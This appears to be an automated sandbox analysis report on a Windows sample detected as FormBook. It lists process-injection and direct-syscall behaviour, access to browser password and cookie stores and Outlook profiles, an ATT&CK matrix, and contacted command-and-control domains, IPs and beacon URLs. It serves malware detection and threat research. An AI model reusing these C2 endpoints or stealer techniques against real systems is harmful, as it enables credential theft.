            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateUserProcess: Direct from: 0x76F0371C
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory written: C:\Users\user\Desktop\yZcecBUXN7.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: read write
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3020
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netsh.exeThread APC queued: target process: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: yZcecBUXN7.exeBinary or memory string: Progman
            Source: yZcecBUXN7.exeBinary or memory string: IsProgmanWindow
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: yZcecBUXN7.exeBinary or memory string: tUser32FocusedMenuhwndMenuhMenuNonClientSysMenuRawTextRange_ScrollIntoViewRawScrollItemPattern_ScrollIntoViewget_CurrentViewRawMultipleViewPattern_SetCurrentViewget_Rowget_WindowIsKnownBadWindowRawUiaEventAddWindowGetFirstOrLastOwnedWindowGetFocusedWindowRawUiaEventRemoveWindowFindModalWindowIsTopLevelWindowIsProgmanWindowIsTransformPatternWindowIsWindowPatternWindowGetDesktopWindowIsWindowSwitchToThisWindowGetWindowGetModuleFileNameExpt_xdxCZGwDCEsywxZZUZfkyhhxget_LabeledBypt_yInitializeArrayToArrayToCharArrayPropertyArrayToIntArrayConvertToElementArraydyIsExtendedKeyMapVirtualKeyVirtualKeyFromKeyget_AcceleratorKeyget_AccessKeyRegisterHotKeyUnregisterHotKeyget_AssemblyGetExecutingAssemblyRegisterClientSideProviderAssemblyGetAssemblyRegisterProxyAssemblyget_IsReadOnlyRaiseEventInThisClientOnlyIndexOfAnyOnEventObjectDestroyCopyget_NonClientMenuBarProxyFactoryget_NonClientProxyFactoryget_User32FocusedMenuProxyFactoryget_NonClientSysMenuProxyFactoryGetProxyFromEntryDictionaryEntryop_Equalityop_InequalityAccessibilitySystem.Securityget_EmptyIsNullOrEmptyget_IsEmptyget_PropertyRuntimeIdPropertyFrameworkIdPropertyAutomationIdPropertyProcessIdPropertyIsEnabledPropertyIsSelectionRequiredPropertyIsSelectedPropertyContainingGridPropertyIsPasswordPropertyLargeChangePropertySmallChangePropertyIsGridPatternAvailablePropertyIsInvokePatternAvailablePropertyIsTablePatternAvailablePropertyIsTogglePatternAvailablePropertyIsExpandCollapsePatternAvailablePropertyIsRangeValuePatternAvailablePropertyIsValuePatternAvailablePropertyIsDockPatternAvailablePropertyIsScrollPatternAvailablePropertyIsGridItemPatternAvailablePropertyIsTableItemPatternAvailablePropertyIsScrollItemPatternAvailablePropertyIsSelectionItemPatternAvailablePropertyIsTransformPatternAvailablePropertyIsSelectionPatternAvailablePropertyIsTextPatternAvailablePropertyIsMultipleViewPatternAvailablePropertyIsWindowPatternAvailablePropertyVerticallyScrollablePropertyHorizontallyScrollablePropertyIsKeyboardFocusablePropertyNativeWindowHandlePropertyBoundingRectanglePropertyCanSelectMultiplePropertyClassNamePropertyLocalizedControlTypePropertyItemTypePropertyCulturePropertyToggleStatePropertyExpandCollapseStatePropertyWindowVisualStatePropertyWindowInteractionStatePropertyCanRotatePropertyValuePropertyCanMovePropertyVerticalViewSizePropertyHorizontalViewSizePropertyCanMinimizePropertyCanMaximizePropertyCanResizePropertyIsModalPropertyIsRequiredForFormPropertyMinimumPropertyMaximumPropertyColumnSpanPropertyRowSpanPropertyIsOffscreenPropertyColumnPropertyAutomationPropertyOrientationPropertySelectionPropertyDockPositionPropertySelectionContainerPropertyRowOrColumnMajorPropertyHasPropertyColumnHeaderItemsPropertyRowHeaderItemsPropertyColumnHeadersPropertyRowHeadersPropertyHasKeyboardFocusPropertyItemStatusPropertySupportedViewsPropertyVerticalScrollPercentPropertyHorizontalScrollPercentPropertyIsControlElementPropertyIsContentElementPropertyClickablePointPropertyColumnCountPropertyRowCountPropertyIsTopmostPropert
            Source: yZcecBUXN7.exeBinary or memory string: CommentsWindows Progman Group ConverterL
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Users\user\Desktop\yZcecBUXN7.exe VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)412
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager21
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook41
            Obfuscated Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing            		LSA Secrets51
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Timestomp            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            File Deletion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Masquerading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron51
            Virtualization/Sandbox Evasion            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd412
            Process Injection            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435169 Sample: yZcecBUXN7.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 28 www.yamiyasheec.online 2->28 30 www.vavada-band.ru 2->30 32 19 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 6 other signatures 2->48 10 yZcecBUXN7.exe 3 2->10         started        signatures3 process4 signatures5 60 Injects a PE file into a foreign processes 10->60 13 yZcecBUXN7.exe 10->13         started        process6 signatures7 62 Maps a DLL or memory area into another process 13->62 16 jBaxmaKIzqHZYEOPQcTTJTXx.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netsh.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Deletes itself after installation 19->54 56 3 other signatures 19->56 22 jBaxmaKIzqHZYEOPQcTTJTXx.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.quantummquest.top 203.161.50.127, 49754, 49755, 49756 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 www.whirledairlines.com 216.40.34.41, 49750, 49751, 49752 TUCOWSCA Canada 22->36 38 10 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            yZcecBUXN7.exe29%ReversingLabs
            yZcecBUXN7.exe38%VirustotalBrowse
            yZcecBUXN7.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            vavada-band.ru4%VirustotalBrowse
            www.dhleba51.ru2%VirustotalBrowse
            applesolve.com1%VirustotalBrowse
            www.bettaroom.ru3%VirustotalBrowse
            dainikmirpur.com0%VirustotalBrowse
            www.applesolve.com1%VirustotalBrowse
            www.dainikmirpur.com0%VirustotalBrowse
            bnbuotqakx.shop5%VirustotalBrowse
            www.vavada-band.ru7%VirustotalBrowse
            www.vaesen.net1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM=100%Avira URL Cloudmalware
            http://www.yamiyasheec.online/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg=0%Avira URL Cloudsafe
            http://www.whirledairlines.com/0hhg/0%Avira URL Cloudsafe
            http://www.applesolve.com/0hhg/0%Avira URL Cloudsafe
            http://www.applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ0%Avira URL Cloudsafe
            http://www.whirledairlines.com/0hhg/0%VirustotalBrowse
            http://www.applesolve.com/0hhg/2%VirustotalBrowse
            http://www.dk48.lol/0hhg/0%Avira URL Cloudsafe
            http://www.dk48.lol/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc=0%Avira URL Cloudsafe
            http://www.xxaiai.top/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo=0%Avira URL Cloudsafe
            http://www.bnbuotqakx.shop/0hhg/100%Avira URL Cloudmalware
            http://www.whirledairlines.com/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4=0%Avira URL Cloudsafe
            http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX0%Avira URL Cloudsafe
            https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC0%Avira URL Cloudsafe
            http://www.quantummquest.top/0hhg/0%Avira URL Cloudsafe
            http://www.quantummquest.top/0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ0%Avira URL Cloudsafe
            http://www.dainikmirpur.com/0hhg/0%Avira URL Cloudsafe
            http://www.yamiyasheec.online/0hhg/0%Avira URL Cloudsafe
            http://www.dhleba51.ru/0hhg/100%Avira URL Cloudmalware
            http://www.xxaiai.top/0hhg/0%Avira URL Cloudsafe
            http://www.dainikmirpur.com/0hhg/0%VirustotalBrowse
            http://www.quantummquest.top/0hhg/1%VirustotalBrowse
            http://www.dainikmirpur.com/0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ0%Avira URL Cloudsafe
            http://www.yamiyasheec.online/0hhg/3%VirustotalBrowse
            http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40=100%Avira URL Cloudmalware
            http://www.bnbuotqakx.shop100%Avira URL Cloudmalware
            http://www.bettaroom.ru/0hhg/0%Avira URL Cloudsafe
            http://www.dhleba51.ru/0hhg/4%VirustotalBrowse
            http://www.cucuzeus88.store/0hhg/0%Avira URL Cloudsafe
            http://www.bettaroom.ru/0hhg/8%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            vavada-band.ru
            		148.251.36.121
            		truefalseunknown
            cucuzeus88.store
            		153.92.8.41
            		truefalse
              		unknown
              www.quantummquest.top
              		203.161.50.127
              		truefalse
                		unknown
                www.dhleba51.ru
                		195.24.68.5
                		truefalseunknown
                applesolve.com
                		188.116.38.155
                		truefalseunknown
                parkingpage.namecheap.com
                		91.195.240.19
                		truefalse
                  		high
                  www.bettaroom.ru
                  		194.58.112.173
                  		truefalseunknown
                  bnbuotqakx.shop
                  		101.99.93.157
                  		truefalseunknown
                  www.xxaiai.top
                  		108.186.8.158
                  		truefalse
                    		unknown
                    dainikmirpur.com
                    		192.250.235.36
                    		truefalseunknown
                    www.whirledairlines.com
                    		216.40.34.41
                    		truefalse
                      		unknown
                      yamiyasheec.online
                      		119.18.54.116
                      		truefalse
                        		unknown
                        www.applesolve.com
                        		unknown
                        		unknowntrueunknown
                        www.cucuzeus88.store
                        		unknown
                        		unknowntrue
                          		unknown
                          www.bnbuotqakx.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            www.dainikmirpur.com
                            		unknown
                            		unknowntrueunknown
                            www.dk48.lol
                            		unknown
                            		unknowntrue
                              		unknown
                              www.cluird.cloud
                              		unknown
                              		unknowntrue
                                		unknown
                                www.yamiyasheec.online
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.vavada-band.ru
                                  		unknown
                                  		unknowntrueunknown
                                  www.vaesen.net
                                  		unknown
                                  		unknowntrueunknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.whirledairlines.com/0hhg/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.yamiyasheec.online/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg=false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM=false
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.applesolve.com/0hhg/false
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dk48.lol/0hhg/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dk48.lol/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc=false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xxaiai.top/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo=false
                                  • Avira URL Cloud: safe
                                  		unknown
